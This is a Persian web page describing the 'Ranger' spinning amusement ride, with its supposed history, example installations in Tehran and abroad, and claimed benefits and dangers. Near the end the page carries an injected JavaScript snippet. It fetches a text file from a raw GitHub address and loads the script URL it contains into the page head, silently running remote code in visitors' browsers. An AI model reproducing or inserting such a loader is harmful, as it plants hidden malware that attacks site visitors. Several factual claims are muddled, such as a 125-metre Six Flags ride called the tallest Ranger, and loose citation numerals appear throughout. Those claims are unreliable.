رنجر

 • رنجر یک نوع بازی هیجان‌انگیز در شهربازی‌ها است که در آن بازیکنان با یک صندلی گردان، در حالت‌های مختلف و با سرعت بالا حرکت می‌کنند. این بازی معمولاً باعث تولید آدرنالین و تحریک حساسیت‌های حرکتی می‌شود. رنجر از کلمه انگلیسی ranger گرفته شده است و به معنی گشتاور یا گرداننده است1.

  رنجر اولین بار در سال ۱۹۹۹ توسط شرکت زایر آلمان طراحی و ساخته شد. این بازی از یک ستون متحرک و یک دستگاه گردان تشکیل شده است که صندلی‌های بازیکنان را به صورت عمودی، افقی و ۳۶۰ درجه می‌چرخاند. ارتفاع این بازی حدود ۳۰ متر و ظرفیت آن ۳۰ نفر است2.

  امروزه، شهربازی‌های مختلف دنیا، از رنجر‌های متنوعی برای جذب بازدیدکنندگان استفاده می‌کنند. برخی از معروف‌ترین رنجر‌های دنیا عبارتند از:

  Ranger: این صندلی گردان در شهربازی ارم در تهران قرار دارد و محصول شرکت زایر آلمان است. این رنجر در سال ۹۵ نصب شد و جزو هیجان‌انگیزترین بازی‌های پارک ارم است3.
  Top Spin: این صندلی گردان در شهربازی گاردالند در ایتالیا واقع است و محصول شرکت هوس آلمان است. این رنجر در سال ۲۰۰۰ افتتاح شد و دارای یک سیستم آب‌پاش است که بازیکنان را مرطوب می‌کند.
  Afterburner: این صندلی گردان در شهربازی فانتزی آیلند در انگلستان قرار دارد و محصول شرکت کاما آلمان است. این رنجر در سال ۲۰۰۴ راه‌اندازی شد و دارای یک سیستم نورپردازی و صوتی پیشرفته است.
  اگر دوست دارید از این بازی‌های هیجان‌انگیز تجربه کنید، می‌توانید به شهربازی‌های مختلف تهران هم سری بزنید. برخی از شهربازی‌های تهران که دارای صندلی گردان هستند عبارتند از:

  رنجر

  شهربازی ارم: این شهربازی یکی از قدیمی‌ترین و بزرگترین شهربازی‌های تهران است که در آن یک صندلی گردان با نام ستاره گردان وجود دارد3.
  شهربازی سرزمین شگفت‌انگیز: این شهربازی در دریاچه چیتگر واقع شده و دارای یک صندلی گردان با نام توپ گردان است.

  مترفع‌ترین رنجر جهان در شهربازی سیکس فلگز در آمریکا قرار دارد. این رنجر به نام سوپرمن: خطر بالا شناخته می‌شود و ارتفاع آن ۱۲۵ متر است. بازیکنان را با سرعت ۱۰۰ کیلومتر در ساعت به بالاترین نقطه می‌برد و سپس به صورت معکوس به پایین می‌آورد1. این رنجر در سال ۲۰۰۳ افتتاح شد و هنوز هم رکورد مترفع‌ترین صندلی گردان را دارد

  رنجر یک نوع بازی هیجان‌انگیز در شهربازی‌ها است که که می‌تواند برای برخی از افراد سرگرم‌کننده و برای برخی دیگر ترسناک باشد. این بازی هم مزایا و هم معایبی دارد که در ادامه به آن‌ها اشاره می‌کنم.

  مزایای رنجر:

  صندلی گردان می‌تواند به افزایش آدرنالین و تحریک سیستم عصبی سمپاتیک کمک کند. این باعث می‌شود که قلب تندتر بزند، فشار خون بالاتر برود و انرژی بیشتری در بدن تولید شود1.
  رنجر می‌تواند به بهبود خلق و خو و احساس خوشحالی منجر شود. زیرا در طول و پس از رنجر، هورمون‌هایی مانند اندورفین، دوپامین و سروتونین که با لذت و شادی مرتبط هستند، در مغز ترشح می‌شوند2.
  صندلی گردان می‌تواند به کاهش استرس و اضطراب کمک کند. چرا که در حین رنجر، توجه فرد به مسائل روزمره و نگرانی‌هایش کمتر می‌شود و فرد با تجربه کردن یک حس موقتی از خطر، می‌تواند از ترس‌هایش فاصله بگیرد3.
  معایب رنجر:

  رنجر

  رنجر ممکن است برای افرادی که مشکلات قلبی، فشار خون، سرگیجه، مشکلات مفصلی یا ستون فقرات دارند، خطرناک باشد. زیرا این بازی می‌تواند باعث ایجاد تنش و فشار بر روی این اعضا شود و منجر به عوارض جدی گردد.
  رنجر ممکن است برای افرادی که از ارتفاع، سرعت یا حرکات ناگهانی می‌ترسند، ناخوشایند باشد. زیرا این بازی می‌تواند باعث ایجاد واکنش‌های ترس، وحشت، تهوع، استفراغ یا حتی بیهوشی شود.
  صندلی گردان ممکن است برای افرادی که به راحتی سردرد می‌گیرند، مضر باشد. زیرا این بازی می‌تواند باعث ایجاد لرزش و ارتعاش در سر و گردن شود و منجر به تحریک عصب‌ها و عروق مغزی شود.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۴ از ۵
  از مجموع ۲ رای

  دیدگاهتان را بنویسید